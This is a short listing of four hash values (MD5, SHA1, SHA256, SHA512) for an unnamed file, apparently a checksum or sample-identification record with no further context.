MD510f6ceca4937e70420e96a5a8b7ce0e6
SHA17c3e45cb90a50c2e5827810bd5283ce19a0a5bec
SHA256c7d6349a697fe0b43db1054f4e4ba1bb785dbbd623b6cb6d5964315e80722020
SHA512d4a84f15c36c88796e87daf9013e0cc83b4995ab93e0092241146d7ec67611ee1a70645549c22ffbc8bcfbad59ed12c712f836a140f0ee6e900226026500197d